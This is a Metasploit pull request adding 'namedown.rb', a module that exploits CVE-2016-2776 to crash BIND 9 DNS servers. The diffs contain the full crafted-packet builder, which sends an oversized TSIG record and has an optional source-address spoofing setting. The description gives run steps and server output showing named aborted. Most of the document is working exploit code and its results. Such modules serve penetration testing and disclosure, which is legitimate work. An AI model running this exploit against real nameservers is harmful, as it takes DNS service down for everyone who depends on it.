### PR TITLE
DoS exploit for CVE-2016-2776

### DIFF
--- a/modules/auxiliary/dos/dns/namedown.rb
+++ b/modules/auxiliary/dos/dns/namedown.rb
@@ -32,7 +32,7 @@ class MetasploitModule < Msf::Auxiliary
       'References'      =>
         [
           [ 'CVE', '2016-2776' ],
-          [ 'URL', 'http://blog.infobytesec.com/2016/09/a-tale-of-packet-cve-2016-2776.html' ]
+          [ 'URL', 'http://blog.infobytesec.com/2016/10/a-tale-of-dns-packet-cve-2016-2776.html' ]
         ],
       'DisclosureDate' => 'Sep 27 2016',
       'DefaultOptions' => {'ScannerRecvWindow' => 0}

--- a/modules/auxiliary/dos/dns/namedown.rb
+++ b/modules/auxiliary/dos/dns/namedown.rb
@@ -35,9 +35,7 @@ class MetasploitModule < Msf::Auxiliary
           [ 'URL', 'http://blog.infobytesec.com/2016/09/a-tale-of-packet-cve-2016-2776.html' ]
         ],
       'DisclosureDate' => 'Sep 27 2016',
-      {
-        'ScannerRecvWindow' => 0
-      }
+      'DefaultOptions' => {'ScannerRecvWindow' => 0}
     ))
 
     register_options([

--- a/modules/auxiliary/dos/dns/namedown.rb
+++ b/modules/auxiliary/dos/dns/namedown.rb
@@ -1,0 +1,166 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'timeout'
+require 'socket'
+
+class MetasploitModule < Msf::Auxiliary
+  
+  include Msf::Exploit::Capture
+  include Msf::Auxiliary::UDPScanner
+  include Msf::Auxiliary::Dos
+  include Msf::Auxiliary::Report
+  
+  def initialize(info={})
+    super(update_info(info,
+      'Name'        => 'BIND 9 DoS CVE-2016-2776',
+      'Description' => %q{
+          Denial of Service Bind 9 DNS Server CVE-2016-2776.
+          Critical error condition which can occur when a nameserver is constructing a response.
+          A defect in the rendering of messages into packets can cause named to exit with an
+          assertion failure in buffer.c while constructing a response to a query that meets certain criteria.    
+          
+          This assertion can be triggered even if the apparent source address isnt allowed 
+          to make queries.
+      },
+      # Research and Original PoC - msf module author
+      'Author'      => [ 'Martin Rocha', 'Ezequiel Tavella', 'Alejandro Parodi', 'Infobyte Research Team'], 
+      'License'     => MSF_LICENSE,
+      'References'      =>
+        [
+          [ 'CVE', '2016-2776' ],
+          [ 'URL', 'http://blog.infobytesec.com/2016/09/a-tale-of-packet-cve-2016-2776.html' ]
+        ],
+      'DisclosureDate' => '2016-09-27'
+    ))
+
+    register_options([
+      Opt::RPORT(53),
+      OptAddress.new('SRC_ADDR', [false, 'Source address to spoof'])
+    ])
+  
+    deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT')
+  end
+
+  def scanner_prescan(batch)
+  	puts '''
+  	       	....                    
+               ,....                    
+             ..........7                
+              7...............7         
+               ........       7..       
+                  .I            I.      
+                                .,      
+                ~....,    7..  I.       
+            ....................        
+          ......................7       
+        ........................I       
+       ........................         
+      ..........................        
+      ..........................        
+     =...........................       
+     ............................       
+     ............................       
+     +..........................,       
+      ..........................7       
+      :.........................        
+       ........................         
+        +....................,          
+         7..................7           
+           7~............:7             
+                7+,,+777 
+  	'''
+  	datastore['ScannerRecvWindow'] = 0
+  end
+
+  def checkServerStatus(ip, rport)
+  	res = ""
+  	sudp = UDPSocket.new
+	sudp.send(validQuery, 0, ip, rport)
+	begin 
+		Timeout.timeout(5) do
+	        res = sudp.recv(100)
+	    end
+	rescue Timeout::Error
+	end
+
+	if(res.length==0)
+     	print_good("Exploit Success (Maybe, nameserver did not replied)")
+     else
+     	print_error("Exploit Failed")
+     end
+  end
+
+  def scan_host(ip)
+  	@flag_success = true
+  	print_status("Sending bombita (Specially crafted udp packet) to: "+ip)
+  	scanner_send(payload, ip, rport)
+  	checkServerStatus(ip, rport) 
+  end
+
+  def getDomain
+  	 domain = "\x06"+Rex::Text.rand_text_alphanumeric(6)
+  	 org = "\x03"+Rex::Text.rand_text_alphanumeric(3)
+  	 getDomain = domain+org
+  end
+
+  def payload
+
+    query = Rex::Text.rand_text_alphanumeric(2)  # Transaction ID: 0x8f65
+    query += "\x00\x00"  # Flags: 0x0000 Standard query
+    query += "\x00\x01"  # Questions: 1
+    query += "\x00\x00"  # Answer RRs: 0
+    query += "\x00\x00"  # Authority RRs: 0
+    query += "\x00\x01"  # Additional RRs: 1
+
+    # Doman Name
+    query += getDomain   # Random DNS Name
+    query += "\x00"      # [End of name]
+    query += "\x00\x01"  # Type: A (Host Address) (1)
+    query += "\x00\x01"  # Class: IN (0x0001)
+    
+    # Aditional records. Name
+    query += ("\x3f"+Rex::Text.rand_text_alphanumeric(63))*3 #192 bytes
+    query += "\x3d"+Rex::Text.rand_text_alphanumeric(61)
+	query += "\x00"
+
+    query += "\x00\xfa" # Type: TSIG (Transaction Signature) (250)
+    query += "\x00\xff" # Class: ANY (0x00ff)
+    query += "\x00\x00\x00\x00" # Time to live: 0
+    query += "\x00\xfc" # Data length: 252
+
+    # Algorithm Name
+    query += ("\x3f"+Rex::Text.rand_text_alphanumeric(63))*3 #Random 192 bytes
+    query += "\x1A"+Rex::Text.rand_text_alphanumeric(26) #Random 26 bytes
+    query += "\x00"
+
+    # Rest of TSIG
+    query += "\x00\x00"+Rex::Text.rand_text_alphanumeric(4) # Time Signed: Jan  1, 1970 03:15:07.000000000 ART
+    query += "\x01\x2c" # Fudge: 300
+    query += "\x00\x10" # MAC Size: 16
+    query +=  Rex::Text.rand_text_alphanumeric(16) # MAC
+    query += "\x8f\x65" # Original Id: 36709
+    query += "\x00\x00" # Error: No error (0)
+    query += "\x00\x00" # Other len: 0
+  end
+
+  def validQuery
+  	query = Rex::Text.rand_text_alphanumeric(2)  # Transaction ID: 0x8f65
+    query += "\x00\x00"  # Flags: 0x0000 Standard query
+    query += "\x00\x01"  # Questions: 1
+    query += "\x00\x00"  # Answer RRs: 0
+    query += "\x00\x00"  # Authority RRs: 0
+    query += "\x00\x00"  # Additional RRs: 0
+
+    # Doman Name
+    query += getDomain   # Random DNS Name
+    query += "\x00"      # [End of name]
+    query += "\x00\x01"  # Type: A (Host Address) (1)
+    query += "\x00\x01"  # Class: IN (0x0001)s
+  end
+
+end
+

--- a/modules/auxiliary/dos/dns/namedown.rb
+++ b/modules/auxiliary/dos/dns/namedown.rb
@@ -34,7 +34,10 @@ class MetasploitModule < Msf::Auxiliary
           [ 'CVE', '2016-2776' ],
           [ 'URL', 'http://blog.infobytesec.com/2016/09/a-tale-of-packet-cve-2016-2776.html' ]
         ],
-      'DisclosureDate' => '2016-09-27'
+      'DisclosureDate' => 'Sep 27 2016',
+      {
+        'ScannerRecvWindow' => 0
+      }
     ))
 
     register_options([
@@ -45,70 +48,38 @@ class MetasploitModule < Msf::Auxiliary
     deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT')
   end
 
-  def scanner_prescan(batch)
-  	puts '''
-  	       	....                    
-               ,....                    
-             ..........7                
-              7...............7         
-               ........       7..       
-                  .I            I.      
-                                .,      
-                ~....,    7..  I.       
-            ....................        
-          ......................7       
-        ........................I       
-       ........................         
-      ..........................        
-      ..........................        
-     =...........................       
-     ............................       
-     ............................       
-     +..........................,       
-      ..........................7       
-      :.........................        
-       ........................         
-        +....................,          
-         7..................7           
-           7~............:7             
-                7+,,+777 
-  	'''
-  	datastore['ScannerRecvWindow'] = 0
-  end
-
   def checkServerStatus(ip, rport)
   	res = ""
   	sudp = UDPSocket.new
-	sudp.send(validQuery, 0, ip, rport)
-	begin 
-		Timeout.timeout(5) do
-	        res = sudp.recv(100)
-	    end
-	rescue Timeout::Error
-	end
+	  sudp.send(validQuery, 0, ip, rport)
+	  begin 
+		  Timeout.timeout(5) do
+	    res = sudp.recv(100)
+	  end
+	  rescue Timeout::Error
+	  end
 
-	if(res.length==0)
-     	print_good("Exploit Success (Maybe, nameserver did not replied)")
-     else
-     	print_error("Exploit Failed")
-     end
+	  if(res.length==0)
+      print_good("Exploit Success (Maybe, nameserver did not replied)")
+      else
+        print_error("Exploit Failed")
+    end
   end
 
   def scan_host(ip)
   	@flag_success = true
   	print_status("Sending bombita (Specially crafted udp packet) to: "+ip)
   	scanner_send(payload, ip, rport)
-  	checkServerStatus(ip, rport) 
+  	checkServerStatus(ip, rport)
   end
 
   def getDomain
-  	 domain = "\x06"+Rex::Text.rand_text_alphanumeric(6)
-  	 org = "\x03"+Rex::Text.rand_text_alphanumeric(3)
-  	 getDomain = domain+org
+  	domain = "\x06"+Rex::Text.rand_text_alphanumeric(6)
+  	org = "\x03"+Rex::Text.rand_text_alphanumeric(3)
+  	getDomain = domain+org
   end
 
   def payload
-
     query = Rex::Text.rand_text_alphanumeric(2)  # Transaction ID: 0x8f65
     query += "\x00\x00"  # Flags: 0x0000 Standard query
     query += "\x00\x01"  # Questions: 1
@@ -125,7 +96,7 @@ class MetasploitModule < Msf::Auxiliary
     # Aditional records. Name
     query += ("\x3f"+Rex::Text.rand_text_alphanumeric(63))*3 #192 bytes
     query += "\x3d"+Rex::Text.rand_text_alphanumeric(61)
-	query += "\x00"
+	  query += "\x00"
 
     query += "\x00\xfa" # Type: TSIG (Transaction Signature) (250)
     query += "\x00\xff" # Class: ANY (0x00ff)


### PR DESCRIPTION
## Verification

Denial of Service for Bind9 versions: 9.0.x -> 9.8.x, 9.9.0->9.9.9-P2, 9.9.3-S1->9.9.9-S3, 9.10.0->9.10.4-P2, 9.11.0a1->9.11.0rc1

List the steps needed to make sure this thing works
- [x] Start Bind9 (Version: 1:9.10.3.dfsg.P4-10.1)
- [x] Start `msfconsole`
- [x] `use auxiliary/dos/dns/namedown`
- [x] set RHOSTS vulnerable_server_ips
- [x] run
- [x] In other tab: service bind9 status:
  If work the expected, output is:

In msfconsole:

```
[*] Sending bombita (Specially crafted udp packet) to: 192.168.10.220
[-] Exploit Failed
[*] Sending bombita (Specially crafted udp packet) to: 127.0.0.1
[+] Exploit Success (Maybe, nameserver did not replied)
[*] Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed
```

In server side:

```
# service bind9 status
bind9.service - BIND Domain Name Server
Loaded: loaded (/lib/systemd/system/bind9.service; disabled; vendor preset: disabled)
Drop-In: /run/systemd/generator/bind9.service.d
└─50-insserv.conf-$named.conf
Active: failed (Result: exit-code) since jue 2016-09-29 21:24:09 ART; 11s ago
Docs: man:named(8)
Process: 31675 ExecStop=/usr/sbin/rndc stop (code=exited, status=1/FAILURE)
Process: 31607 ExecStart=/usr/sbin/named -f -u bind (code=killed, signal=ABRT)
Main PID: 31607 (code=killed, signal=ABRT)
```

Link to CVE (Advisory): https://kb.isc.org/article/AA-01419/0/CVE-2016-2776%3A-Assertion-Failure-in-buffer.c-While-Building-Responses-to-a-Specifically-Constructed-Request.html
